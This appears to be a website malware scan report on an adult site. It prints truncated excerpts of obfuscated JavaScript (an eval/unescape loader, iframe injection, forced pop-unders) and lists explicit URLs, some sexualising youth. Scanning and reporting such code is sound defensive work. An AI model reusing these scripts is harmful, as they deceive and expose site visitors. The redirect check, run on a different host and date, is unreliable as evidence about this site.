Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=5up.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://5up.net/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artepilipino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 05:38:28 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4702
Content-Type: text/html
...4702 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: artepilipino.com
Referer: http://www.google.com/search?q=artepilipino.com
Result:
The result is similar to the first query. No suspicious redirects were found. Note that the redirect-check requests shown here were sent with Host: artepilipino.com and the first response is dated 27 Jan 2015, while the blacklist queries and scanned pages in this report are for 5up.net with responses dated 15 Sep 2014, so this check may not reflect 5up.net's own redirect behavior.
Scanned pages/files
Request | Server response | Status |
http://5up.net/ | 200 OK Content-Length: 74395 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: pussymm.com <HTML> <HEAD> <base target=_blank> <TITLE>5up Free Porn Archive</TITLE> <META name="description" content="WORLDS LARGEST FREE PORN ARCHIVES"> <META name="keywords" content="porno,fuck,nude,virgins,virgin,fuck,sex,porn"> <style type=text/css> td { FONT-SIZE: 11pt; FONT-FAMILY: tahoma; font-weight: bold} A:link { COLOR: ffffff; TEXT-DECORATION: underline } A:visit ...[4861 bytes skipped]... | ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://adspaces.ero-advertising.com/adspace/138174.js | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://5up.net/out/out.php?w=1&p=100&url=http://www.virginz.net | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 06:30:30 GMT Location: http://www.5up.net/tp/out.php?p=0&link=BC Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.6 | clean |
http://www.5up.net/tp/out.php?p=0&link=bc | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 06:30:30 GMT Location: http://www.ratx.com/tube/13231509/Young_Russian_Virgin Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html Set-Cookie: tp=MXwxfDE0MTA3NjI2MzB8MTQxMDc2MjYzMHwxOw%3D%3D; expires=Tue, 16-Sep-2014 06:30:30 GMT; path=/ Set-Cookie: ca=redirected X-Powered-By: PHP/5.2.6 | malicious |
http://www.ratx.com/tube/13231509/young_russian_virgin | 200 OK Content-Length: 10156 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;eval(unescape('va\162%20qy%37%3D%27%27%3B%71%79%38%3D\123%74ri\156%67%2Ef\162o\155%43%68\141\162Cod\145%28%31%33%2C%31%30%29%3Bfo%72%28\151%3D%30%3B%69%3C%32%33%35%35%3B\151%2B%2B%29%7Bq%79%37%2B%3 ...[1087 bytes skipped]... Decoded script: ...[1239 bytes skipped]... imeout("cc()",200)};cc()};function cNS(e){if(dl||ws){if(e.which==2||e.which==3){(msg);return false}}};if(dl){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=cNS}else{document.onmouseup=cNS};document.oncontextmenu=new Function("return false");if(oe){function ro(e){if(event.button==2){alert(' ');return 0};return true};document.onmousedown=ro};s0='<table>qg<tr><td valign=top>qg<iframe src=http://rp92802348hg39nbb392093b34dk88j.ratx.com/ratx.php?vid=';s1=' scrolling="no" align="MIDDLE" width="630" height="490" frameborder="No" marginHeight="0" marginWidth="0"></iframe>qg<br> <a href=http://www.sextubedownload.com/><font face=verdana size=2><b>Get Premium Access for $2.95 To Download This Movie Instantly Plus over 1300 Movies</a>qg</td>qg<td align=center valign=top>qg <iframe src=http://www.ratx.com/movies/midad.php scro ...[1920 bytes skipped]... Antivirus reports: none are included in this capture, so the antivirus confirmation cannot be checked from this page. In the visible portion, the loader sniffs the user agent and hides its payload behind eval(unescape(...)) with mixed octal and percent escapes; the decoded script blocks right-click and the context menu and assembles iframes pointing at ratx.com hosts. The skipped bytes may contain further behavior.
| ||
http://www.ratx.com/fpc.js | 200 OK Content-Length: 1982 Content-Type: application/javascript | malicious |
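Malicious code - confirmed by antiviruses (see below): ...[1559 bytes skipped]... } else if ( document.addEventListener ) { document.addEventListener( 'click', checkTarget, false ); } } function checkTarget(e) { if ( !getCookie('re4k') ) { var e = e || window.event; var browLangCode = navigator.browserLanguage; var refer = window.location.href; var url = "http://www.tubery.net"; var win = doOpen(url); setCookie('rek', 1, 24*60*60*1000); } } initPu(); Antivirus reports: none are included in this capture, so the antivirus confirmation cannot be checked from this page. The visible code registers a document-wide click handler that opens http://www.tubery.net through doOpen() (defined in the skipped bytes), which is consistent with a pop-up/pop-under ad script. As captured, the handler tests the cookie 're4k' but sets 'rek', so the apparent once-per-day cap would not take effect and the window would open on every click.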
| ||
http://adspaces.ero-advertising.com/adspace/135975.js | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://5up.net/movies/videos.php?link=top&to=24sextube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=1teenporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=redpeppertube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=moviemo.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=porntubedownload.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=tube3.org | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=yourexgirls.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://5up.net/movies/videos.php?link=top&to=youngschoolgirls.biz | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |